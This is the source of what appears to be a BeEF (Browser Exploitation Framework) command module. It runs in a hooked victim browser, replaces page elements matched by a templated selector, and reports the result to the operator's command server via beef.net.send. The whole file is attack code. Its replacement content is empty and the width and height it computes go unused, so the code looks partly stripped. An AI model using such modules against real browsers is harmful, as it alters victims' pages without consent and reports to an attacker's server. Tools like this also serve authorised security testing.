// // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { $j('<%= @jquery_selector %>').each(function(){ var width = $j(this).css('width'); var height = $j(this).css('height'); $j(this).replaceWith(''); }); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace video successful"); });